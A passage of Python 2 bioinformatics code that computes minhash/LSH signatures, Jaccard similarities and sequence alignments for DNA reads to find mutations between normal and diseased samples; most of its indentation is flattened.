DEFAULT MINHASH ALGORITHM
Uses hash functions in the form ((a*pos+b) mod p) mod N,
    where a and b are random integers and p is a prime with p > N.
    Computes the original position of each shingle by enumerating all
    shingles once and storing them in a table for fast look-up; the table is
    passed in as the `shingles` argument.
"""
# Find signature for each document
signature = []
#signature = array.array('l')
docShingles = getDocShingles(dna, k)
#numShingles = len(shingles)
for i in xrange(rows):
minVal = n
for shingle in docShingles:
pos = shingles[shingle]
val = ((a[i]*pos+b[i]) % p) % n
if val < minVal:
minVal = val
signature.append(minVal)
# print signature
key = ','.join(map(str, signature))
if key in buckets:
buckets[key].append(idx)
else:
buckets[key] = [idx]
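# Editor's sketch (hypothetical wiring, never called): how a single read part
# would be minhashed with the default algorithm. `table` is assumed to map
# each k-shingle to its enumeration index, as built by computeShinglesTable.
def _example_minhash_one_part(part, table, k, rows):
    n = len(table)
    p = getPrime(n)
    a = [random.randrange(1, n) for _ in xrange(rows)]
    b = [random.randrange(n) for _ in xrange(rows)]
    buckets = dict()
    minhashing_alg6(part, 0, table, buckets, k, rows, p, a, b, n)
    return buckets.keys()[0]  # the signature key this part hashes to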
def minhashing_alg7(dna, idx, shingles, buckets, k, rows, p, a, b, n):
"""
Uses hash functions in the form ((a*pos+b) mod p) mod N,
    where a and b are random integers and p is a prime with p > N.
    Encodes each k-shingle directly as a base-4 number (getDocShingles with
    asSet=False), so no shingle look-up table is needed.
"""
# Find signature for each document
signature = []
#signature = array.array('l')
docShingles = getDocShingles(dna, k, False)
for i in xrange(rows):
minVal = n
for pos in docShingles:
#pos = shingles[shingle]
val = ((a[i]*pos+b[i]) % p) # % n
if val < minVal:
minVal = val
signature.append(minVal)
#print signature
key = ','.join(map(str, signature))
if key in buckets:
buckets[key].append(idx)
else:
buckets[key] = [idx]
# ************************************************************************** #
# #
# Similarity checkers #
# #
# ************************************************************************** #
def pairsFoundByLSH(normal, diseased, candidatePairs, k, b, r, log):
"""
Check which pairs, with similarity above the threshold t, are found by
LSH and which are missed
"""
seqsNormal = getAllReads(normal, log)
global secondSample
secondSample = len(seqsNormal)
seqsDiseased = getAllReads(diseased, log)
seqs = seqsNormal + seqsDiseased
filename = "alligator_20K_new5"
path = "lshPairsVsAllPairs/"
f1 = open(path+"naive_pairs_all_"+filename+"_b_"+str(b)+"_r_"+
str(r)+"_k_"+str(k)+".txt", 'w')
f2 = open(path+"jaccard_sets_pairs_all_"+filename+"_b_"+str(b)+"_r_"+
str(r)+"_k_"+str(k)+".txt", 'w')
f3 = open(path+"jaccard_bags_pairs_all_"+filename+"_b_"+str(b)+"_r_"+
str(r)+"_k_"+str(k)+".txt", 'w')
f4 = open(path+"naive_pairs_lsh_"+filename+"_b_"+str(b)+"_r_"+
str(r)+"_k_"+str(k)+".txt", 'w')
f5 = open(path+"jaccard_sets_pairs_lsh_"+filename+"_b_"+str(b)+"_r_"+
str(r)+"_k_"+str(k)+".txt", 'w')
f6 = open(path+"jaccard_bags_pairs_lsh_"+filename+"_b_"+str(b)+"_r_"+
str(r)+"_k_"+str(k)+".txt", 'w')
count = 0
numPairs = len(seqs) * (len(seqs)-1)
#sims = dict()
truePairs_naive = set()
truePairs_sets = set()
truePairs_bags = set()
sim_threshold = 0.4
naive_threshold = 0.97
doPrint = False
tim = time.clock()
truePairs_lsh_naive = set()
truePairs_lsh_sets = set()
truePairs_lsh_bags = set()
# Compute similarities for all pairs
for i in xrange(0,len(seqs),2):
for j in xrange(1, len(seqs),2):
if i+1 != j:
count += 1
naive = globalAlignment(seqs[i],seqs[j], 33)
jaccard_sets = jaccardSim(seqs[i], seqs[j], k)
jaccard_bags = jaccardSim(seqs[i], seqs[j], k, False)
#sims[(i,j)] = (naive, jaccard_sets, jaccard_bags)
if naive > 0.8 and jaccard_sets < 0.4:
logprint(log, False, seqs[i])
logprint(log, False, seqs[j])
logprint(log, True, "Naive:", naive, "Jaccard:",
jaccard_sets,"\n")
if naive > naive_threshold:
truePairs_naive.add((i,j))
f1.write(str(i)+","+str(j)+" "+str(naive)+"\n")
# if i in candidatePairs:
# if j in candidatePairs[i]:
# truePairs_lsh_naive.add((i,j))
# f4.write(str(i)+","+str(j)+" "+str(naive)+"\n")
if jaccard_sets > sim_threshold:
truePairs_sets.add((i,j))
f2.write(str(i)+","+str(j)+" "+str(jaccard_sets)+"\n")
# if i in candidatePairs:
# if j in candidatePairs[i]:
# truePairs_lsh_sets.add((i,j))
# f5.write(str(i)+","+str(j)+" "+
# str(jaccard_sets)+"\n")
if jaccard_bags > sim_threshold:
truePairs_bags.add((i,j))
f3.write(str(i)+","+str(j)+" "+str(jaccard_bags)+"\n")
# if i in candidatePairs:
# if j in candidatePairs[i]:
# truePairs_lsh_bags.add((i,j))
# f6.write(str(i)+","+str(j)+" "+
# str(jaccard_bags)+"\n")
if i in candidatePairs:
if j in candidatePairs[i]:
truePairs_lsh_naive.add((i,j))
f4.write(str(i)+","+str(j)+" "+str(naive)+"\n")
truePairs_lsh_sets.add((i,j))
f5.write(str(i)+","+str(j)+" "+str(jaccard_sets)+"\n")
truePairs_lsh_bags.add((i,j))
f6.write(str(i)+","+str(j)+" "+str(jaccard_bags)+"\n")
if doPrint:
print i,j
print seqs[i], seqs[j]
print naive
print jaccard_sets
print jaccard_bags
if count % 500000 == 0:
logprint(log, False, "Processed", format(count, ',d'),
"pairs in", (time.clock() - tim) / 60, "minutes")
logprint(log, True, "Memory usage (in mb):",
memory_usage_resource())
processing_time = (time.clock() - tim) / 60
c = "{:,}".format(count).replace(",", ".")
logprint(log, False, "Processed", c, "pairs in", processing_time,
"minutes")
logprint(log, False, "Memory usage (in mb):", memory_usage_resource())
# logprint(log, False, "Difference jaccard sets vs naive\n",
# truePairs_sets.difference(truePairs_naive))
# logprint(log, False, "Difference naive vs jaccard sets\n",
# truePairs_naive.difference(truePairs_sets))
logprint(log, False, "Number of all pairs:", count)
# Compute similarites for lsh pairs
# totalPairs = 0
# truePairs_lsh_naive = set()
# truePairs_lsh_sets = set()
# truePairs_lsh_bags = set()
# for i in candidatePairs:
# for j in candidatePairs[i]:
# if i % 2 == 0:
# totalPairs += 1
# if sims[(i,j)][0] > sim_threshold:
# truePairs_lsh_naive.add((i,j))
# f4.write(str(i)+","+str(j)+" "+str(sims[(i,j)][0])+"\n")
# if sims[(i,j)][1] > sim_threshold:
# truePairs_lsh_sets.add((i,j))
# f5.write(str(i)+","+str(j)+" "+str(sims[(i,j)][1])+"\n")
# if sims[(i,j)][2] > sim_threshold:
# truePairs_lsh_bags.add((i,j))
# f6.write(str(i)+","+str(j)+" "+str(sims[(i,j)][2])+"\n")
logprint(log, False, "Naive pairs not found by LSH\n",
len(truePairs_naive.difference(truePairs_lsh_naive)))
logprint(log, False, "Jaccard set pairs not found by LSH\n",
len(truePairs_sets.difference(truePairs_lsh_sets)))
logprint(log, False, "Jaccard bag pairs not found by LSH\n",
len(truePairs_bags.difference(truePairs_lsh_bags)))
# logprint(log, False, "Number of lsh pairs:", totalPairs)
def findSimilarPairs(reads, candidatePairs, k, b, r, m, log):
"""
    Find candidate pairs that have a similarity above the threshold t
"""
p = "coord_output/"
f1 = open(p+"naive_vs_jaccard_standard_NA19240_b"+str(b)+"_r"+
str(r)+"_k"+str(k)+"_m"+str(m)+".txt", 'w')
f2 = open(p+"naive_NA19240_b"+str(b)+"_r"+str(r)+
"_k"+str(k)+"_m"+str(m)+".txt", 'w')
f3 = open(p+"standard_jaccard_NA19240_b"+str(b)+"_r"+str(r)+
"_k"+str(k)+"_m"+str(m)+".txt", 'w')
f4 = open(p+"pairs_NA19240_b"+str(b)+"_r"+str(r)+
"_k"+str(k)+"_m"+str(m)+".txt", 'w')
f5 = open(p+"naive_and_jaccard_info_NA19240_b"+str(b)+"_r"+
str(r)+"_k"+str(k)+"_m"+str(m)+".txt", 'w')
counter = 0
logprint(log, True, "Finding similar pairs")
timer = time.clock()
numReads = len(reads)
maxNumPairs = len(candidatePairs) * (len(candidatePairs)-1)
logprint(log, True, "Number of reads", numReads)
for doc1 in candidatePairs:
for doc2 in candidatePairs[doc1]:
counter += 1
dna1 = reads[doc1]
dna2 = reads[doc2]
if doc1 % 2 == 0:
bestMatch1 = globalAlignment(dna1, dna2, False)
bestMatch2 = jaccardSim(dna1, dna2, k)
else:
bestMatch1 = globalAlignment(dna2, dna1, False)
bestMatch2 = jaccardSim(dna2, dna1, k)
if extraInfo:
f1.write(str(bestMatch1[0]) + " " + str(bestMatch2) + "\n")
f2.write(str(bestMatch1[0]) + " " + str(bestMatch1[1]) + " " +
str(bestMatch1[2]) + "\n")
f5.write(str(bestMatch1[0]) + " " + str(bestMatch1[1]) + " " +
str(bestMatch1[2]) + " " + str(bestMatch2) + "\n")
else:
f1.write(str(bestMatch1) + " " + str(bestMatch2) + "\n")
f2.write(str(bestMatch1) + "\n")
f3.write(str(bestMatch2) + "\n")
f4.write(str(doc1) + " " + str(doc2) + "\n")
if counter % 500000 == 0:
logprint(log, False, "Processed", format(counter, ',d'),
"pairs in", (time.clock() - timer) / 60, "minutes")
logprint(log, True, "Memory usage (in mb):",
memory_usage_resource())
processing_time = (time.clock() - timer) / 60
c = "{:,}".format(counter).replace(",", ".")
logprint(log, False, "Processed", c, "pairs in", processing_time,
"minutes")
logprint(log, True, "Memory usage (in mb):", memory_usage_resource())
def globalAlignment(dna1, dna2, t, extraInfo=False):
"""
    Aligns two sequences with a sliding-window approach and returns the best
    score (matches / window length) between them.
    dna1 is a left part and dna2 is a right part.
"""
start = 0
start2 = 0
if len(dna1) > len(dna2):
#start2 = len(dna1) - len(dna2)
readLen = len(dna2)
else:
readLen = len(dna1)
if extraInfo:
bestScore = (0, 0, 0)
else:
bestScore = 0
seqLength = readLen-start
while seqLength > t:
# print seqLength, bestScore[1]
matches = 0
matches2 = 0
for i in xrange(seqLength):
# print len(doc1.dna)-start
if dna1[i] == dna2[i+start]:
matches += 1
if dna1[i+start] == dna2[i]:
matches2 += 1
# print bestScore
score = matches / float(seqLength)
score2 = matches2 / float(seqLength)
if extraInfo:
if score > bestScore[0]:
# print score, bestScore[0]
# print seqLength, matches, bestScore[1]
bestScore = (score, matches, seqLength)
if bestScore[0] == 1.0:
return bestScore
if score2 > bestScore[0]:
bestScore = (score2, matches2, seqLength)
if bestScore[0] == 1.0:
return bestScore
else:
if score > bestScore:
bestScore = score
if bestScore == 1.0:
return bestScore
if score2 > bestScore:
bestScore = score2
if bestScore == 1.0:
return bestScore
start += 1
seqLength = readLen-start
return bestScore
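# Worked example (editor's sketch): a perfect 3-base overlap between two
# 4-mers scores 1.0 once the window has slid one position (threshold t=1).
def _example_global_alignment():
    assert globalAlignment("ACGT", "CGTA", 1) == 1.0
    # With extraInfo the score, match count and window length are returned.
    assert globalAlignment("ACGT", "CGTA", 1, extraInfo=True) == (1.0, 3, 3)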
def jaccardSim(doc1, doc2, k, jaccard_sets=True):
"""
Computing the jaccard similarity.
Option to use jaccard bag similarity or standard jaccard similarity.
"""
# ## standard jaccard sim ## #
if jaccard_sets:
shingles1 = getDocShingles(doc1, k)
shingles2 = getDocShingles(doc2, k)
intersection = shingles1.intersection(shingles2)
if len(intersection) == 0:
return 0
union = shingles1.union(shingles2)
return float(len(intersection)) / len(union)
# ## Bag jaccard sim ## #
else:
shingles1 = getDocShingles(doc1, k, False)
shingles2 = getDocShingles(doc2, k, False)
counterA = Counter(shingles1)
counterB = Counter(shingles2)
intersection = sum((counterA & counterB).values())
if intersection == 0:
return 0
# Definition 1
#union = len(shingles1) + len(shingles2)# - intersection
# Definition 2
union = sum((counterA | counterB).values())
return float(intersection) / union
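# Worked example (editor's sketch): set vs. bag Jaccard on repeated shingles.
def _example_jaccard():
    # Set similarity ignores multiplicity: both reads only have shingle "AA".
    assert jaccardSim("AAAA", "AAA", 2) == 1.0
    # Bag similarity keeps multiplicity: min-counts / max-counts = 2/3.
    assert abs(jaccardSim("AAAA", "AAA", 2, False) - 2.0 / 3.0) < 1e-9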
def makeSPlot(fasta_file, candidatePairs, k, b, r, alg, log):
"""
    Method used for obtaining information about the validity of the pairs
    found by LSH.
"""
### Used for saving each individual pairs similarity
# f1 = open("candidate_pairs_b"+str(b)+"_r"+str(r)+"_k"+str(k)+
# "_m"+str(alg)+"_all.txt", 'w')
# f2 = open("candidate_pairs_b"+str(b)+"_r"+str(r)+"_k"+str(k)+
# "_m"+str(alg)+"_lsh.txt", 'w')
# f3 = open("candidate_pairs_b"+str(b)+"_r"+str(r)+"_k"+str(k)+
# "_m"+str(alg)+"_rest.txt", 'w')
reads = getAllReads(fasta_file, log)
# Create a mapper to look up position in array given a similarity
n1 = len(reads[0])
n2 = len(reads[1])
maxNumShingles = (n1-k+1)+(n2-k+1)
possibleSims = set([0])
for i in xrange(1, n1):
for j in xrange(i, maxNumShingles-i+1):
possibleSims.add(float(i)/j)
posSimilarities = dict()
possibleSims = sorted(list(possibleSims))
for idx, sim in enumerate(possibleSims):
posSimilarities[sim] = idx
# print posSimilarities
# print len(posSimilarities)
allPairs = [0 for i in xrange(len(possibleSims))]
lshPairs = [0 for i in xrange(len(possibleSims))]
numReads = len(reads)
pairNum = 0
timer = time.clock()
count = 0
count2 = 0
process = 0
# for doc1 in xrange(numReads):
# start = 1
# if doc1 % 2 == 0:
# start = 3
# for doc2 in xrange(doc1+start, numReads, 2):
for doc1 in xrange(0, numReads, 2):
for doc2 in xrange(1, numReads, 2):
            if doc1 + 1 != doc2:
dna1 = reads[doc1]
dna2 = reads[doc2]
jaccard = jaccardSim(dna1, dna2, k)
### Saves the similarity for each pair, and for pairs found by LSH
# if jaccard > 0:
# f1.write(str(pairNum) + " " + str(jaccard) + "\n")
# rest = True
# if doc1 in candidatePairs:
# if doc2 in candidatePairs[doc1]:
# f2.write(str(pairNum) + " " + str(jaccard) + "\n")
# rest = False
# count += 1
# if rest:
# f3.write(str(pairNum) + " " + str(jaccard) + "\n")
# count2 += 1
# pairNum += 1
if jaccard > 0:
pos = posSimilarities[jaccard]
if doc1 in candidatePairs:
if doc2 in candidatePairs[doc1]:
lshPairs[pos] += 1
count += 1
allPairs[pos] += 1
pairNum += 1
else:
allPairs[0] += 1
process += 1
if process % 500000 == 0:
logprint(log, True, "Processed", process,
"pairs in time:", (time.clock() - timer),
"Found", pairNum, "cand. pairs")
p = "s_plot/"
f = open(p+"s_shape_info_b"+str(b)+"_r"+str(r)+"_k"+str(k)+
"_m"+str(alg)+"_readsfa.txt", 'w')
for i in xrange(len(allPairs)):
if allPairs[i] == 0:
f.write(str(0)+" "+str(0)+" "+str(0)+
" "+str(possibleSims[i])+"\n")
else:
f.write(str(lshPairs[i])+" "+str(allPairs[i])+" "+
str(float(lshPairs[i]) / allPairs[i])+" "+
str(possibleSims[i]) + "\n")
logprint(log, False, "Candidate pairs found by LSH:", count)
logprint(log, False, "Number of pairs not found by LSH:", pairNum-count)
logprint(log, True, "Total number of pairs:", pairNum)
def euclideanDistance(doc1, doc2):
sig1, sig2 = doc1.signature, doc2.signature
# lol = sum([(x-y)**2 for x, y in itertools.izip(sig1, sig2)])
# if counter2 < 100:
# print doc1.id, doc2.id
# print sig1
# print sig2
# print lol
# else:
# sys.exit(0)
    intersum = 0
    for x, y in itertools.izip(sig1, sig2):
        intersum += (x - y) ** 2
    # Euclidean distance between the two minhash signatures
    return intersum ** 0.5
def longest_common_substring(s1, s2):
m = [[0] * (1 + len(s2)) for i in xrange(1 + len(s1))]
longest, x_longest = 0, 0
for x in xrange(1, 1 + len(s1)):
for y in xrange(1, 1 + len(s2)):
if s1[x - 1] == s2[y - 1]:
m[x][y] = m[x - 1][y - 1] + 1
if m[x][y] > longest:
longest = m[x][y]
x_longest = x
else:
m[x][y] = 0
return s1[x_longest - longest: x_longest]
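# Worked example (editor's sketch): the longest substring shared by the two
# inputs is returned, here the 4-mer "GTAC".
def _example_lcs():
    assert longest_common_substring("ACGTACGT", "GTAC") == "GTAC"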
def testLCS(doc1, doc2):
"""
Test longest_common_substring method
"""
sig1 = ''.join(map(str, doc1.signature))
sig2 = ''.join(map(str, doc2.signature))
seq = longest_common_substring(sig1, sig2)
# print (doc1.id, doc2.id),
# if counter2 < 100:
# print doc1.id, doc2.id
# print sig1
# print sig2
# print seq
# print
# else:
# sys.exit(0)
return seq
def NeedlemanWunsch(doc1, doc2):
"""
Sequence alignment using the Needleman-Wunsch algorithm
"""
# scores
match = 1
mismatch = -1
indel = -2
# seqA = "abcd"
# seqB = "bcd"
seqA = doc1.dna
seqB = doc2.dna
# scoreMatrix = [[0 for x in xrange(len(seqB)+1)] for x in
# xrange((len(seqA)+1))]
scoreMatrix = [[0] * (1 + len(seqB)) for i in xrange(1 + len(seqA))]
for i in xrange(len(seqA)+1):
scoreMatrix[i][0] = i*indel
for j in xrange(len(seqB)+1):
scoreMatrix[0][j] = j*indel
for i in xrange(1, len(seqA)+1):
for j in xrange(1, len(seqB)+1):
if seqA[i-1] == seqB[j-1]:
score = scoreMatrix[i-1][j-1] + match
else:
score = scoreMatrix[i-1][j-1] + mismatch
opt1 = scoreMatrix[i-1][j] + indel
opt2 = scoreMatrix[i][j-1] + indel
maxi = opt1
if opt2 > maxi:
maxi = opt2
if score > maxi:
maxi = score
scoreMatrix[i][j] = maxi
    # print seqA
    # print seqB
    # print scoreMatrix[len(seqA)][len(seqB)]
    # for row in scoreMatrix:
    #     print row
    # Return the optimal global alignment score (bottom-right cell)
    return scoreMatrix[len(seqA)][len(seqB)]
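# Worked example (editor's sketch): with match=1, mismatch=-1, indel=-2,
# aligning "ACGT" against "ACG" gives 3 matches and one gap, score 3 - 2 = 1.
# The _ExampleDoc wrapper is hypothetical; NeedlemanWunsch only needs .dna.
class _ExampleDoc(object):
    def __init__(self, dna):
        self.dna = dna

def _example_needleman_wunsch():
    assert NeedlemanWunsch(_ExampleDoc("ACGT"), _ExampleDoc("ACG")) == 1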
# ************************************************************************** #
# #
# Sequence Alignment #
# #
# ************************************************************************** #
class AlignedGroup(object):
"""
"""
consensus = []
#preConsensus = []
readROffset = 0
consensusMain = 0 # read_R
# reads in group coming from left part - Normal sample
leftPartsN = dict()
# reads in group coming from left part - Diseased sample
leftPartsD = dict()
leftReadsOffset = 0
maxLeftReadsOffset = 0
# rightParts = dict() # reads in group coming from right part
# reads in group coming from right part and touching pre-consensus
# preRightParts = dict()
checkedRightParts = set()
rightPartGroups = [] # List of RightPart objects
mismatches = set()
# Initializer
def __init__(self, read_R, readROffset, leftReadsOffset):
self.consensus = []
#self.preConsensus = []
self.readROffset = readROffset
self.consensusMain = read_R
self.leftPartsN = dict()
self.leftPartsD = dict()
self.leftReadsOffset = leftReadsOffset
self.maxLeftReadsOffset = leftReadsOffset
#self.rightParts = dict()
#self.preRightParts = dict()
self.checkedRightParts = set()
self.rightPartGroups = []
self.mismatches = set()
class RightPartGroup(object):
"""
"""
consensus = []
preConsensus = []
rightPartsN = dict()
rightPartsD = dict()
mismatches = set()
# Initializer
def __init__(self, consensus):
self.consensus = copy.deepcopy(consensus)
self.preConsensus = []
self.rightPartsN = dict()
self.rightPartsD = dict()
self.mismatches = set()
def print_compare(read_R, misPos, mut, consens, log):
compareString = ""
for i in xrange(len(read_R)):
if i == misPos:
compareString += mut
else:
compareString += read_R[i]
logprint(log, False, "searchString:", compareString)
def print_fullConsensus(preconsensus, consensus, log=None):
alphabetSize = 4
for i in xrange(alphabetSize):
consensusString = ""
# pre-consensus
for j in xrange(len(preconsensus)):
consensusString += " "
# for j in xrange(len(preconsensus)):
# if i < len(preconsensus[j]) and \
# preconsensus[j][preconsensus[j].keys()[i]] >= \
# requiredOverlaps:
# consensusString += preconsensus[j].keys()[i]
# else:
# consensusString += " "
# Space between pre-consensus and consensus
# if consensusString != "":
# consensusString += " "
# Get main consensus
for j in xrange(len(consensus)):
if i < len(consensus[j]) and \
consensus[j][consensus[j].keys()[i]] >= requiredOverlaps:
consensusString += consensus[j].keys()[i]
else:
consensusString += " "
if consensusString.strip() != "":
print "", consensusString
if log:
log.write(" "+consensusString+"\n")
else:
continue
def print_alignedGroup(group, rightPartGroup, read_R, seqs, log):
logprint(log, False, "\nread_R:", read_R)
logprint(log, False, "Consensus:")
print_fullConsensus(rightPartGroup.preConsensus,
rightPartGroup.consensus, log)
lenPre = len(rightPartGroup.preConsensus)
newOffset = lenPre + group.readROffset
# Print normal reads
if read_R < secondSample:
logprint(log, False, " " * lenPre,
seqs[read_R-1]+""+seqs[read_R]+"*")
for read_L in group.leftPartsN:
for offset in group.leftPartsN[read_L]:
logprint(log, False, " " * (newOffset +
offset), seqs[read_L]+""+seqs[read_L+1])
for read_R2 in rightPartGroup.rightPartsN:
for offset in rightPartGroup.rightPartsN[read_R2]:
logprint(log, False, " " * (offset + lenPre),
seqs[read_R2-1]+""+seqs[read_R2])
# Print diseased reads
logprint(log, False, "")
if read_R >= secondSample:
logprint(log, False, " " * lenPre,
seqs[read_R-1]+""+seqs[read_R]+"*")
for read_L in group.leftPartsD:
for offset in group.leftPartsD[read_L]:
logprint(log, False, " " * (newOffset +
offset), seqs[read_L]+""+seqs[read_L+1])
for read_R2 in rightPartGroup.rightPartsD:
for offset in rightPartGroup.rightPartsD[read_R2]:
logprint(log, False, " " * (offset + lenPre),
seqs[read_R2-1]+""+seqs[read_R2])
leftParts = group.leftPartsN.keys() + \
group.leftPartsD.keys()
logprint(log, False, "Left parts:",
sorted(list(leftParts)))
logprint(log, False, "Number of left parts:",
len(leftParts))
rightParts = rightPartGroup.rightPartsN.keys() + \
rightPartGroup.rightPartsD.keys()
logprint(log, False, "Right parts:",
sorted(rightParts))
logprint(log, False, "Number of right parts:",
len(rightParts))
logprint(log, True, "mismatches:",
list(rightPartGroup.mismatches))
def print_leftGroup(group, read_R, seqs, log):
logprint(log, False, "\nread_R:", read_R)
logprint(log, False, "Consensus:")
print_fullConsensus([], group.consensus, log)
logprint(log, False, "", seqs[read_R-1]+""+seqs[read_R]+"*")
for read_L in group.leftPartsN:
for offset in group.leftPartsN[read_L]:
logprint(log, False, " " * (offset + group.readROffset),
seqs[read_L]+""+seqs[read_L+1])
logprint(log, False, "")
for read_L in group.leftPartsD:
for offset in group.leftPartsD[read_L]:
logprint(log, False, " " * (offset + group.readROffset),
seqs[read_L]+""+seqs[read_L+1])
def print_alignedGroups(groups, read_R, seqs, log):
for group in groups:
if len(group.rightPartGroups) > 0:
for rightPartGroup in group.rightPartGroups:
if len(rightPartGroup.mismatches) > 0:
logprint(log, False, "\nread_R:", read_R)
logprint(log, False, "Consensus:")
# logprint(log, False, "", ''.join(consensus.keys()[0]
# for consensus in group.preConsensus) + #" " +
# ''.join(consensus.keys()[0] for consensus
# in group.consensus))
print_fullConsensus(rightPartGroup.preConsensus,
rightPartGroup.consensus, log)
lenPre = len(rightPartGroup.preConsensus)
newOffset = lenPre + group.readROffset
# Print normal reads
if read_R < secondSample:
logprint(log, False, " " * lenPre,
seqs[read_R-1]+""+seqs[read_R]+"*")
for read_L in group.leftPartsN:
for offset in group.leftPartsN[read_L]:
logprint(log, False, " " * (newOffset +
offset), seqs[read_L]+""+seqs[read_L+1])
for read_R2 in rightPartGroup.rightPartsN:
for offset in rightPartGroup.rightPartsN[read_R2]:
logprint(log, False, " " * (offset + lenPre),
seqs[read_R2-1]+""+seqs[read_R2])
# Print diseased reads
logprint(log, False, "")
if read_R >= secondSample:
logprint(log, False, " " * lenPre,
seqs[read_R-1]+""+seqs[read_R]+"*")
for read_L in group.leftPartsD:
for offset in group.leftPartsD[read_L]:
logprint(log, False, " " * (newOffset +
offset), seqs[read_L]+""+seqs[read_L+1])
for read_R2 in rightPartGroup.rightPartsD:
for offset in rightPartGroup.rightPartsD[read_R2]:
logprint(log, False, " " * (offset + lenPre),
seqs[read_R2-1]+""+seqs[read_R2])
leftParts = group.leftPartsN.keys() + \
group.leftPartsD.keys()
logprint(log, False, "Left parts:",
sorted(list(leftParts)))
logprint(log, False, "Number of left parts:",
len(leftParts))
rightParts = rightPartGroup.rightPartsN.keys() + \
rightPartGroup.rightPartsD.keys()
logprint(log, False, "Right parts:",
sorted(rightParts))
logprint(log, False, "Number of right parts:",
len(rightParts))
logprint(log, False, "mismatches:",
list(rightPartGroup.mismatches))
# logprint(log, False, "Number of mismatches:",
# len(rightPartGroup.mismatches))
# if len(group.mismatches) > 0:
# sys.exit()
# else:
elif len(group.mismatches) > 0:
logprint(log, False, "\nread_R:", read_R)
logprint(log, False, "Consensus:")
# logprint(log, False, "", ''.join(consensus.keys()[0]
# for consensus in group.consensus))
print_fullConsensus([], group.consensus, log)
if read_R < secondSample:
logprint(log, False, "",
seqs[read_R-1]+""+seqs[read_R]+"*")
for read_L in group.leftPartsN:
for offset in group.leftPartsN[read_L]:
logprint(log, False, " " *(offset +
group.readROffset),
seqs[read_L]+""+seqs[read_L+1])
if read_R >= secondSample:
logprint(log, False, "",
seqs[read_R-1]+""+seqs[read_R]+"*")
for read_L in group.leftPartsD:
for offset in group.leftPartsD[read_L]:
logprint(log, False, " " *(offset +
group.readROffset),
seqs[read_L]+""+seqs[read_L+1])
logprint(log, False, "mismatches:", group.mismatches)
leftParts = group.leftPartsN.keys() + group.leftPartsD.keys()
logprint(log, False, "Left parts:", sorted(leftParts))
logprint(log, True, "Number of left parts:", len(leftParts))
def sequenceAlignment(candidatePairs, normal, diseased, log):
seqsNormal = getAllReads(normal, log)
global secondSample
secondSample = len(seqsNormal)
seqsDiseased = getAllReads(diseased, log)
seqs = seqsNormal + seqsDiseased
numAlignedGroups = []
numRightPartGroups = []
numMutations1 = 0
numMutations2 = 0
numParts = len(candidatePairs) / 4 + 2
prog = 0
tim = time.clock()
for read_R in candidatePairs:
#for read_R in xrange(1, len(seqs)+1, 20):
#print read_R
if read_R < secondSample and read_R % 2 == 1:
# if read_R % 2 == 1:
# if read_R == 42535:
# if read_R == 19:
if len(candidatePairs[read_R]) > maxCandMates:
continue
alignedGroups = []
# Align left parts
alignLeftParts(read_R, seqs, alignedGroups, candidatePairs, log)
# Align right parts
alignRightParts(read_R, seqs, alignedGroups, candidatePairs, log)
# Analyze the aligned group to find mutations
if MUTFIND == 1:
numMutations1 += oldFindMutation(read_R, seqs,
alignedGroups,log)
else:
numMutations2 += newFindMutation(read_R, seqs,
alignedGroups,log)
# Statistics on number of created groups
numAlignedGroups.append(len(alignedGroups))
for group in alignedGroups:
numRightPartGroups.append(len(group.rightPartGroups))
#print_alignedGroups(alignedGroups, read_R, seqs, log)
# sys.exit()
prog += 1
if prog % 500 == 0:
logprint(log, False, "Processed", prog, "of", numParts,
"anchor points in", (time.clock()-tim)/60, "minutes")
logprint(log, True, "Memory usage (in mb):",
memory_usage_resource())
global c1
logprint(log, False, "left parts aligned:", c1)
#c1 = 0
global c2
logprint(log, True, "right parts aligned:", c2)
logprint(log, True, "num useful groups:", numMutations1)
logprint(log, True, "num useful groups:", numMutations2)
global c3
logprint(log, False, "positions compared:", c3)
#c2 = 0
logprint(log, False, "Finished sequence alignment",
(time.clock() - tim) / 60, "minutes")
logprint(log, True, "Memory usage (in mb):", memory_usage_resource())
logprint(log, False, "c1:", c1)
logprint(log, False, "c2:", c2)
logprint(log, False, "c3:", c3)
logprint(log, False, "c4:", c4)
logprint(log, False, "c5:", c5)
logprint(log, False, "c6:", c6)
logprint(log, False, "c7:", c7)
logprint(log, False, "Too small groups:", c8)
logprint(log, False, "numReadL:", numreadL)
logprint(log, False, "numReadR:", numreadR)
logprint(log, False, "numMutations1:", numMutations1)
logprint(log, False, "numMutations2:", numMutations2)
logprint(log, False, "counterAlignGroups:\n", Counter(numAlignedGroups))
logprint(log, False, "counterRightGroups:\n", Counter(numRightPartGroups))
def multiSeqAlign(seqs, p, pool_size, num, candidatePairs, log):
#seqs, p, pool_size, num, log = tup
global p_id
p_id = p
log = None
numMutations1 = 0
numMutations2 = 0
numParts = ((num+1) / 2) / pool_size
prog = 0
tim = time.clock()
#r = redis.StrictRedis()
#r = shelve.open("shelveDBs/cache0", "r")
for read_R in xrange(p*2+1, secondSample+1, pool_size*2):
#print read_R
alignedGroups = []
# Align left parts
#alignLeftParts(read_R, seqs, alignedGroups, None, log, r)
alignLeftParts(read_R, seqs, alignedGroups, candidatePairs, log)
# Align right parts
#alignRightParts(read_R, seqs, alignedGroups, None, log, r)
alignRightParts(read_R, seqs, alignedGroups, candidatePairs, log)
# Analyze the aligned group to find mutations
if MUTFIND == 1:
numMutations1 += oldFindMutation(read_R, seqs,
alignedGroups, log)
else:
numMutations2 += newFindMutation(read_R, seqs,
alignedGroups, log)
#print_alignedGroups(alignedGroups, read_R, seqs, log)
# sys.exit()
prog += 1
if prog % 500 == 0:
logprint(log, False, "Processed", prog, "of", numParts,
"anchor points in", (time.clock()-tim)/60, "minutes")
logprint(log, True, "Memory usage (in mb):",
memory_usage_resource())
global c1
logprint(log, False, "left parts aligned:", c1)
#c1 = 0
global c2
logprint(log, True, "right parts aligned:", c2)
logprint(log, True, "num useful groups:", numMutations1)
logprint(log, True, "num useful groups:", numMutations2)
global c3
logprint(log, False, "positions compared:", c3)
#c2 = 0
logprint(log, False, "Finished sequence alignment",
(time.clock() - tim) / 60, "minutes")
logprint(log, True, "Memory usage (in mb):", memory_usage_resource())
logprint(log, False, "c1:", c1)
logprint(log, False, "c2:", c2)
logprint(log, False, "c3:", c3)
logprint(log, False, "c4:", c4)
logprint(log, False, "c5:", c5)
logprint(log, False, "c6:", c6)
logprint(log, False, "c7:", c7)
logprint(log, False, "Too small groups:", c8)
logprint(log, False, "numReadL:", numreadL)
logprint(log, False, "numReadR:", numreadR)
logprint(log, False, "numMutations1:", numMutations1)
logprint(log, False, "numMutations2:", numMutations2)
#logprint(log, False, "counterAlignGroups:\n", Counter(numAlignedGroups))
